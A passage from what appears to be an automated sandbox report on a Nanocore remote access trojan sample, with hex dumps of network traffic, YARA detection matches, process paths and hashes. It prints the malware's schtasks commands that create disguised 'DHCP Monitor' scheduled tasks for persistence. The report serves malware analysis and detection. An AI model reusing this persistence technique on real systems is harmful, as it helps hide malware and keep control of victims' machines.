PrrJp\|~1cvVk5Fz>^OfLKh ]Y#VMoAeLFc2dka),<i0jpKcgG:"h[ZSR?4}.X&Sr&g5&:&;&=?
2021-10-13 19:03:03 UTC	1958	IN	Data Raw: 3d cc 0b 1e 36 4d 7c aa 0e 54 0d 27 4c 97 79 ac b3 82 46 a2 c3 bb 97 31 ce ee 9f 34 54 34 ef 73 69 a7 03 4b 7a 9e 45 0f 60 0f 73 df 43 94 f7 71 4d e4 59 90 4f 6e 69 ac 33 23 71 e6 5c 52 3d 61 60 9f cd ac 87 20 f4 49 ff a2 39 9e dd 58 1b 9b b8 72 34 e4 d5 41 5c 64 e9 0d f4 da 75 49 80 62 d8 ff c3 e5 e9 bc c1 b2 70 15 a0 a5 0a 4e 6a 54 c7 4a ad c8 d2 8a 29 93 36 a5 43 af 7b 85 8d 99 af 1f 5d 57 a9 97 7c 91 bd aa 26 cf 2f ad ad 4a d9 79 b6 39 63 c1 a0 3d c4 ef 27 58 2d 73 b2 dc 7e 1e 9c 87 75 0a 16 fa 85 99 20 7b 41 21 07 33 eb 3b ca 6e 7e 53 8c c9 5e 28 43 7d 19 36 86 67 a9 2f c2 7b e3 47 c2 31 19 c2 6a 35 c6 9d e1 b8 c3 d8 2e a0 d9 50 02 0a 67 42 c0 54 cd fd 36 45 54 66 e4 74 13 4a a3 fa 5d bb 38 c5 60 56 3b e2 f4 2f 7d 3d b9 1d 00 14 9f 6d cd 3a 89 99 c4 Data Ascii: =6M\|T'LyF14T4siKzE`sCqMYOni3#q\R=a` I9Xr4A\duIbpNjTJ)6C{]W\|&/Jy9c='X-s~u {A!3;n~S^(C}6g/{G1j5.PgBT6ETftJ]8`V;/}=m:
2021-10-13 19:03:03 UTC	1974	IN	Data Raw: 7c 47 2d b4 5c ae 4f 77 ba b7 78 f3 f6 aa 7c c2 33 6c 80 9a 6e 49 b7 15 e4 6f d7 ee e1 73 ac 68 e5 d5 73 5a 3c b7 a2 e4 0f 0d ff 11 b2 d4 c4 5c 6e 69 c7 02 99 d6 36 3e fa 97 49 fd 38 63 c5 01 b4 bf db d8 9b a1 31 49 af 57 11 19 d8 35 5b 03 a6 42 14 6f 8e ca 58 57 3e 0e 02 eb a3 db 33 4e 16 b0 d6 40 90 f8 38 f2 03 7b c0 7c f8 02 4b ea 22 40 a9 32 c0 26 fd 32 01 6b 4e 4d f6 09 fd 21 0c fa a5 cb 81 6b 51 db 09 73 39 a4 29 0c 1a ce b4 96 9b 34 55 1a 8b cb 4c d5 43 26 95 de bf 2c 4c 34 85 b3 ad 19 23 bc 31 c1 5f 1a 04 9a 17 2e 4f c6 a0 7e ae 21 8e 5b ab d4 36 cc e2 d0 0c 6d d8 e2 e0 e4 9b 62 46 8a 72 61 1c 2b 79 dd 3b 30 7d b9 fb 09 74 bd 4f af 23 de 8f 41 73 da a3 02 ba d1 8f 46 88 d2 d6 1a 81 6b ec b4 10 f6 4d 65 31 52 2d 29 4f b4 0a 70 0b f2 7d 5e 71 f1 05 Data Ascii: \|G-\Owx\|3lnIoshsZ<\ni6>I8c1IW5[BoXW>3N@8{\|K"@2&2kNM!kQs9)4ULC&,L4#1_.O~![6mbFra+y;0}tO#AsFkMe1R-)Op}^q
2021-10-13 19:03:03 UTC	1990	IN	Data Raw: e7 5c b3 ee 60 99 a6 40 24 0c 81 37 5a 10 92 f4 bb a0 c4 98 75 44 3c a3 47 98 70 13 2d ed 7f a6 0a 06 c9 88 2b e3 fa 71 7d 2d 59 da 44 26 f2 e4 a9 9e 19 6b 89 9c da 6f 94 c5 4e 22 80 20 a7 a4 14 67 16 e7 60 25 b7 9b ae 19 34 29 0c 6d e5 b3 f5 e1 c2 a7 65 8a 21 d1 47 6d 9d 63 e2 11 69 5b 48 ca 32 e2 7f 3c 59 74 2b 19 af 5f be 68 c5 9d dc 2e a1 aa 45 e1 55 e8 97 c0 00 36 f1 fd a3 18 ee 35 92 ce ac c3 86 45 75 3e 3b 25 fa 4f 3c 20 de 93 bd 40 f0 97 18 e3 47 e3 9d a4 f7 22 a3 3d 69 a5 f5 ff 26 ee f9 79 03 77 2e ca 12 81 52 62 00 5a 15 2b d4 ac 28 d6 ce b8 a0 05 0b fb 0e ea b2 92 22 c0 ca fa 00 00 85 5e f4 3c e2 63 64 6f 4b fe a3 5a d7 0b b0 e9 99 6c 1b 6c 0f 07 34 ed 07 e7 fd be d1 63 8c 76 af 5b d6 eb 37 ed dd e5 98 1c e6 ec 21 e4 b0 f6 51 59 55 41 c5 2e 2a Data Ascii: \`@$7ZuD<Gp-+q}-YD&koN" g`%4)me!Gmci[H2<Yt+_h.EU65Eu>;%O< @G"=i&yw.RbZ+("^<cdoKZll4cv[7!QYUA.*
2021-10-13 19:03:03 UTC	2006	IN	Data Raw: 3d 9b 18 4b 34 88 09 aa 00 17 f5 17 b4 37 88 62 e4 30 a7 65 8b 00 a6 29 9b db b4 76 a9 9c 44 de 0c af 53 06 02 f0 ba 03 8c 36 9c 47 3a f0 c7 58 2b 72 be d6 80 a9 b2 59 65 81 e7 6c d4 df e0 22 d3 86 fa 20 fa 2a 89 2e 6b 5a a8 1d 09 7e d6 b7 88 69 cf ee 1d 2b 3e 8c ad 90 d1 42 49 a1 d5 8f 90 9d da 31 14 2b cc 77 c2 a7 34 49 ae 29 d8 14 af 45 12 3d 83 fa 42 a3 f4 29 ed ce 59 5d 43 9e 0d 37 c6 35 30 e8 c0 ec ab fc 17 cc 71 76 de be f0 51 65 17 8c aa d6 da 1a 85 bf 0a 33 1c d7 f6 8b 09 ec ff 88 42 db da 52 af c5 68 0d c1 27 ff bc d7 8b df d2 4c 9c 88 1e 54 95 60 07 88 c3 c4 9c 4f b8 86 dc 97 f0 3e 32 6c bf 74 98 70 55 51 d2 08 79 af 1c 55 25 fd 49 4e 56 3d ae bb f7 0a a6 9a 6e de be db 9e 1a a4 23 d5 6a 6e 54 fe 87 e8 47 6a 24 d2 68 bf cc 22 24 b5 ef 47 ca a4 Data Ascii: =K47b0e)vDS6G:X+rYel" *.kZ~i+>BI1+w4I)E=B)Y]C750qvQe3BRh'LT`O>2ltpUQyU%INV=n#jnTGj$h"$G
2021-10-13 19:03:03 UTC	2022	IN	Data Raw: c6 db 9b 10 31 8b fc 49 64 81 4a 3e 56 88 24 e9 15 7a 12 96 36 a7 fd b0 ef 66 f6 76 33 bb 41 76 2c c9 10 28 ff 1a 60 e9 de f6 9b 1f 49 6e cc 1c 32 21 d2 1e 0a 12 77 0c ab a7 af 3f 0c 8a f2 54 c8 45 64 2a 01 55 ca 35 ec 62 4e 73 49 97 d1 7c 46 3c 4e b6 06 14 12 cd 79 cd b9 b3 50 af c1 4e a8 6f b7 b7 28 a4 57 7d 27 ce cb 32 de 5d 29 52 28 09 59 5f b4 dd 29 2e 8d 88 15 b9 6f 01 66 2a 41 1d bf 3f 4f e1 b8 d8 4d 0a 2c d4 14 03 3c 4b 7b a6 38 1d 63 3c 1a 46 da ab 43 61 f8 1a e0 28 d8 42 f5 5a fd 16 e9 62 95 93 c4 0f d2 36 8f 70 4c 3a e5 7b ea 24 47 28 98 dc de ef f9 7d 6c 2b e0 bd 1a 5e a5 9f f6 49 61 ee 62 b4 57 d2 93 85 99 2e 95 39 cd 86 72 50 dc 52 13 07 2d bb ed 1f 08 53 35 74 1c dd 64 fd 7f d0 8c d6 22 e2 c8 1d 56 da 27 7b aa 7a b1 a7 3f 58 a7 03 88 1d 0d Data Ascii: 1IdJ>V$z6fv3Av,(`In2!w?TEdU5bNsI\|F<NyPNo(W}'2])R(Y_).ofA?OM,<K{8c<FCa(BZb6pL:{$G(}l+^IabW.9rPR-S5td"V'{z?X
2021-10-13 19:03:03 UTC	2038	IN	Data Raw: e1 2b b9 81 f6 3a 6f 5d 67 38 13 e2 a9 1f a9 e7 4d bf 25 ae a7 5d f1 15 46 69 4b b8 14 9f 9c 36 69 af 01 15 f9 bd 40 26 1d 75 05 44 2a 06 f7 2b 69 8e 2c 1c df b3 ed 35 f2 cc 49 2c bc 52 a3 49 a5 ef 99 8e 8f 08 2d a1 cc 95 de f7 73 e7 9f fd 80 09 a6 70 92 90 8d 7a 42 6c dd 12 ab 2e 13 05 36 ae 39 3c 6d 62 9c e9 c1 6a 5d c8 40 18 cf 79 1c 52 29 bf 65 85 a3 42 f3 13 75 a0 70 db 83 10 83 03 49 2f d5 5f 04 f3 da 3d 7d 4e 91 fc 0c 5d 6a 07 a4 66 54 11 28 bc 33 29 4c 64 47 3e 7e 2b 50 7b 0a 7d 9f 90 e1 07 20 dd d4 da 67 7f b8 0d a4 09 78 0a 9f 3e b5 bd 39 e3 4a 01 24 c2 9f 0b 72 b3 32 ea 31 8c 7a 0d d6 08 56 fb ef ea 89 2b 7c 18 90 3a 0a 52 16 01 c9 d3 18 d5 47 1c 0b 22 d4 f5 2b 6d 6b 21 6c f0 76 91 a7 77 8e cf 0d da 5e a8 36 d0 2b 98 6e 1e 8b 89 66 69 4a 21 ca Data Ascii: +:o]g8M%]FiK6i@&uD*+i,5I,RI-spzBl.69<mbj]@yR)eBupI/_=}N]jfT(3)LdG>~+P{} gx>9J$r21zV+\|:RG"+mk!lvw^6+nfiJ!
2021-10-13 19:03:03 UTC	2054	IN	Data Raw: 31 58 66 24 f8 91 5f 71 08 fb db 34 6e 05 4e 1b fb d8 0d 4a e1 69 f1 78 35 c2 5b ae ce 82 29 22 4b eb 00 b4 b2 e6 d4 db 46 c3 5d a1 c3 12 80 68 1d 9f 1b 2e 20 30 bf 68 7a 70 bf 0d 32 1a c9 fa 0b e6 16 66 ca 7b 32 37 93 fb 7b e8 98 a5 21 3d bf 0f 44 be dd 11 f8 96 9a 4c b9 92 ba ce 0a 2f bd 44 29 0f 61 03 d4 66 a2 0c a6 b5 a1 e9 8e d9 0f 6a 22 08 83 dc b1 47 2d 54 e2 0e f4 2e d5 0f 2a 67 fb 80 58 8a c8 76 b4 ac 63 ca fe 30 ef 72 80 0b 10 23 06 b6 f1 93 3c dc 59 a5 ea 63 2f bb 7a be 16 73 d5 e5 34 b9 70 87 bd 60 92 28 c1 b4 d3 03 b0 fe 9a cf 8e 68 2e 11 65 b5 73 ba 45 86 94 d9 4c 58 0e 0b 2c 19 a0 26 c1 cf 1e 51 d2 c4 7f d0 dd 51 a9 84 92 e7 3e e6 78 72 1b d9 4d e6 e1 ca af 55 26 8c 11 be f6 1f 25 8d d9 28 dc 40 11 9e 7c c0 a5 b7 fa 42 ef 52 64 f6 f8 6a 63 Data Ascii: 1Xf$_q4nNJix5[)"KF]h. 0hzp2f{27{!=DL/D)afj"G-T.*gXvc0r#<Yc/zs4p`(h.esELX,&QQ>xrMU&%(@\|BRdjc
2021-10-13 19:03:03 UTC	2070	IN	Data Raw: 61 65 a0 b9 5d e3 ad af af d2 71 59 89 d2 c2 c7 0a 7f 19 32 49 51 bb 57 29 58 96 df fe 20 3b f2 86 e5 72 25 a4 57 9b 68 27 38 87 9d b3 29 de 0f 25 e6 a9 0b 19 5a 13 80 1f a7 ba b3 0b ce 10 f3 15 36 fa 11 4a d1 f4 a2 31 87 d8 aa d6 33 5e 5a fb 16 22 ac ee 45 1f 13 b3 96 d0 1a 3e c8 41 93 23 d1 17 68 4d f4 36 a6 7b 0e eb 52 fd c9 c5 f5 ea 09 b3 a7 55 89 ff 53 d0 2d e0 76 f6 05 3c c7 07 cd 24 61 75 7d b5 db 62 c8 dc a8 d7 74 3c 9c 25 ee a9 85 3b af c1 8b 0c 47 dd c2 53 7f e3 29 2b dd e9 fd 9d 71 2e 73 7b c4 41 0c b0 cd f6 c7 1c d6 02 f8 6f 62 07 45 d1 b3 a1 2a da f8 96 8f 4d 1e 39 bd e6 cf d6 a3 b0 7a 73 93 15 c3 34 f9 4f e1 c1 b9 84 98 80 c4 04 b4 1e c9 89 86 ed 57 40 98 94 0a bc 10 27 fa ed 39 fb 8a ca 45 ca ef fd 31 99 97 90 05 1b 21 2c 40 11 c7 25 d8 4c Data Ascii: ae]qY2IQW)X ;r%Wh'8)%Z6J13^Z"E>A#hM6{RUS-v<$au}bt<%;GS)+q.s{AobE*M9zs4OW@'9E1!,@%L
2021-10-13 19:03:03 UTC	2086	IN	Data Raw: 73 23 5c d4 94 e7 94 60 6c 9d 21 1c dc fa a7 79 11 2f d0 fd 25 96 76 4c 9c de 07 da 70 b1 8c d5 98 9e da 19 11 15 ff 57 6d b1 5f a9 50 e6 f1 e1 da ba c4 e9 ff d1 af c7 57 e6 62 9b 73 60 3f e0 b5 d0 7e 1d c4 c5 2a 3a 22 00 92 0f 9f 5b 5c 32 78 8c 9f 4c ef dc c8 8c a4 b1 e4 f7 71 7e 7a d0 2e 11 83 36 bf 12 35 fa fc c6 f2 90 20 d1 a0 92 20 de 40 37 58 b5 ff 05 e8 e0 3a 4c d3 2e 01 59 09 73 a7 be 13 3f 65 0e 97 78 d7 38 86 18 d1 7d 64 f2 93 11 60 db 75 76 73 68 61 11 fe cd 3d 4c c1 97 32 44 4e eb 45 48 40 38 06 dd ed 7a 76 43 3c d7 50 1e 44 07 aa 37 7b 37 f4 8c 97 a5 32 25 39 c3 96 8e 32 53 47 5f 96 56 a6 8b 6a 2f 5b 92 94 33 33 31 20 e8 7b c7 2b 63 2f 46 69 a6 9c 13 2c 3b 9c e0 83 b8 c9 88 4a 6d 7d c6 bc af 5e 73 74 90 3e 7a b1 7e 75 64 d1 18 70 84 3a 50 76 Data Ascii: s#\`l!y/%vLpWm_PWbs`?~*:"[\2xLq~z.65 @7X:L.Ys?ex8}d`uvsha=L2DNEH@8zvC<PD7{72%92SG_Vj/[331 {+c/Fi,;Jm}^st>z~udp:Pv
2021-10-13 19:03:03 UTC	2102	IN	Data Raw: ac cd c1 54 a3 6b 63 ce 0f bc aa 11 3f 07 b3 b1 cb 4d 8b 03 64 d5 c8 0f 03 ed 79 44 81 4d d1 4d 81 31 0f 33 90 3c eb 47 3b 1c 79 76 01 d1 4b 00 b6 33 d6 8a 5a 83 46 c9 57 ec c8 af 25 5a fb 70 79 da 17 5a 1b 6d 92 f1 d3 55 20 96 dc 27 9b 6f 4b 49 e2 3b 52 67 41 59 a8 c7 a1 fc 2d 4c bd bf eb 35 32 d7 36 2f a3 d1 6b 84 6f d9 c2 7c 34 f2 49 6d 0d ad e0 c8 8a ba 64 96 c1 25 3f 0d 7b b1 0b d8 d7 2c 16 75 48 c4 67 b6 e1 c7 53 6f 64 53 ea de 1f 08 22 e9 36 bb c9 b7 ec 2e cc 4e a2 02 b2 5a 13 b8 23 d4 39 f8 7b bc c8 9e dc e2 5e 8f d3 3f 31 07 dd 8d b4 ea 5b b0 c1 38 8d 98 f1 2b 13 c2 11 48 9e a5 e8 71 c4 5f bc 71 d5 da 72 6a 64 5c fc 0c df 49 e3 5d a9 18 58 ca 9c de a8 b7 6d 06 67 80 1f 67 e3 0f d1 c4 4f af 16 07 7c ac 3d d9 5e c3 0b 4d 9d a6 fa ac ee 98 02 51 bb Data Ascii: Tkc?MdyDMM13<G;yvK3ZFW%ZpyZmU 'oKI;RgAY-L526/ko\|4Imd%?{,uHgSodS"6.NZ#9{^?1[8+Hq_qrjd\I]XmggO\|=^MQ
2021-10-13 19:03:03 UTC	2118	IN	Data Raw: 03 ee e0 f0 6a df 96 aa 67 dd 5b ec 5d ac ae cc 3c 1b 8d c3 7d 60 a0 50 c0 e4 ba d0 7f 67 b2 f2 e7 db cf 7b 23 2b 93 1d 9b 84 47 d7 d3 fb 0c ec 6c 83 80 db 2f f4 54 ea a1 0e 14 2c ef ba 93 e7 5f ba 8f a0 e7 09 3a 84 ae 3c 4a c1 87 53 9d b3 f5 f1 f1 bb 94 42 41 a0 7b 02 bd a8 6d 84 ba 13 64 77 b9 8b 59 e8 6d 5c 8b 5d df 78 e4 6b d3 59 a8 1d b6 a4 67 5d 51 40 1f 3b 1d eb 7a 00 fb e5 07 1a 9c fc 3d 64 38 79 2d e7 50 ed 47 68 d8 5d 9a e5 63 b8 31 0d ae 36 e0 f9 ef 35 cd 65 26 5a 5e 6a 5e 83 c2 4b 4e a8 ad c5 52 1e 20 b5 96 99 1c d9 2d 36 78 18 bd ed 73 5a 5a 82 f1 50 07 ff 42 4d 60 19 6e ca 46 72 a1 99 ed 9a 62 b7 23 99 15 7a 91 0b 10 31 72 16 5c 75 56 56 2d 71 c0 c0 fd df 6a 13 53 3e da a7 bc 75 4e b4 91 33 86 bb 86 b5 cd 8d 1a 92 d4 02 c2 32 74 93 90 ed 85 Data Ascii: jg[]<}`Pg{#+Gl/T,_:<JSBA{mdwYm\]xkYg]Q@;z=d8y-PGh]c165e&Z^j^KNR -6xsZZPBM`nFrb#z1r\uVV-qjS>uN32t

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: LFEs2N6DU4.exe PID: 2752 Parent PID: 5804

General

Start time:	21:02:04
Start date:	13/10/2021
Path:	C:\Users\user\Desktop\LFEs2N6DU4.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\LFEs2N6DU4.exe'
Imagebase:	0x60000
File size:	12288 bytes
MD5 hash:	5B3262B61A5EAA3EBE7E8BDC4958FC3F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000001.00000002.310115829.0000000003559000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000001.00000002.310115829.0000000003559000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000001.00000002.310115829.0000000003559000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000001.00000002.309846950.00000000034BA000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000001.00000002.309846950.00000000034BA000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000001.00000002.309846950.00000000034BA000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000001.00000002.309323538.000000000244F000.00000004.00000001.sdmp, Author: Florian Roth Rule: NanoCore, Description: unknown, Source: 00000001.00000002.309323538.000000000244F000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
Reputation:	low

Chronological Activities

Analysis Process: LFEs2N6DU4.exe PID: 3784 Parent PID: 2752

General

Start time:	21:02:27
Start date:	13/10/2021
Path:	C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe
Imagebase:	0x960000
File size:	12288 bytes
MD5 hash:	5B3262B61A5EAA3EBE7E8BDC4958FC3F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000D.00000002.537037036.0000000003DA9000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 0000000D.00000002.537037036.0000000003DA9000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000D.00000002.527752364.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000D.00000002.527752364.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 0000000D.00000002.527752364.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000D.00000002.534572652.0000000002DA1000.00000004.00000001.sdmp, Author: Joe Security Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000D.00000002.538189526.00000000055D0000.00000004.00020000.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000D.00000002.538189526.00000000055D0000.00000004.00020000.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000D.00000002.538301786.0000000005650000.00000004.00020000.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000D.00000002.538301786.0000000005650000.00000004.00020000.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000D.00000002.538301786.0000000005650000.00000004.00020000.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: schtasks.exe PID: 5828 Parent PID: 3784

General

Start time:	21:02:30
Start date:	13/10/2021
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmpA85B.tmp'
Imagebase:	0xba0000
File size:	185856 bytes
MD5 hash:	15FF7D8324231381BAD48A052F85DF04
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 6008 Parent PID: 5828

General

Start time:	21:02:31
Start date:	13/10/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff774ee0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: schtasks.exe PID: 2944 Parent PID: 3784

General

Start time:	21:02:31
Start date:	13/10/2021
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	'schtasks.exe' /create /f /tn 'DHCP Monitor Task' /xml 'C:\Users\user\AppData\Local\Temp\tmpAD7D.tmp'
Imagebase:	0xba0000
File size:	185856 bytes
MD5 hash:	15FF7D8324231381BAD48A052F85DF04
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 4196 Parent PID: 2944

General

Start time:	21:02:32
Start date:	13/10/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff774ee0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: LFEs2N6DU4.exe PID: 2860 Parent PID: 1104

General

Start time:	21:02:32
Start date:	13/10/2021
Path:	C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe 0
Imagebase:	0xd70000
File size:	12288 bytes
MD5 hash:	5B3262B61A5EAA3EBE7E8BDC4958FC3F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000014.00000002.379660901.000000000414A000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000014.00000002.379660901.000000000414A000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000014.00000002.379660901.000000000414A000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000014.00000002.379884809.00000000041E9000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000014.00000002.379884809.00000000041E9000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000014.00000002.379884809.00000000041E9000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000014.00000002.378626193.000000000310B000.00000004.00000001.sdmp, Author: Florian Roth Rule: NanoCore, Description: unknown, Source: 00000014.00000002.378626193.000000000310B000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>

Chronological Activities

Analysis Process: dhcpmon.exe PID: 6188 Parent PID: 1104

General

Start time:	21:02:35
Start date:	13/10/2021
Path:	C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' 0
Imagebase:	0x460000
File size:	12288 bytes
MD5 hash:	5B3262B61A5EAA3EBE7E8BDC4958FC3F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000015.00000002.388544589.000000000279F000.00000004.00000001.sdmp, Author: Florian Roth Rule: NanoCore, Description: unknown, Source: 00000015.00000002.388544589.000000000279F000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000015.00000002.390215746.00000000038A9000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000015.00000002.390215746.00000000038A9000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000015.00000002.390215746.00000000038A9000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000015.00000002.389928508.000000000380A000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000015.00000002.389928508.000000000380A000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000015.00000002.389928508.000000000380A000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>

Chronological Activities

Analysis Process: dhcpmon.exe PID: 6304 Parent PID: 3292

General

Start time:	21:02:42
Start date:	13/10/2021
Path:	C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe'
Imagebase:	0x6f0000
File size:	12288 bytes
MD5 hash:	5B3262B61A5EAA3EBE7E8BDC4958FC3F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000016.00000002.399257150.0000000003BBA000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000016.00000002.399257150.0000000003BBA000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000016.00000002.399257150.0000000003BBA000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000016.00000002.399603161.0000000003C59000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000016.00000002.399603161.0000000003C59000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000016.00000002.399603161.0000000003C59000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000016.00000002.397927395.0000000002B4F000.00000004.00000001.sdmp, Author: Florian Roth Rule: NanoCore, Description: unknown, Source: 00000016.00000002.397927395.0000000002B4F000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>

Chronological Activities

Analysis Process: LFEs2N6DU4.exe PID: 6504 Parent PID: 2860

General

Start time:	21:02:56
Start date:	13/10/2021
Path:	C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe
Imagebase:	0xd00000
File size:	12288 bytes
MD5 hash:	5B3262B61A5EAA3EBE7E8BDC4958FC3F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000018.00000002.395949741.0000000004179000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000018.00000002.395949741.0000000004179000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000018.00000002.392927550.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000018.00000002.392927550.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000018.00000002.392927550.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen 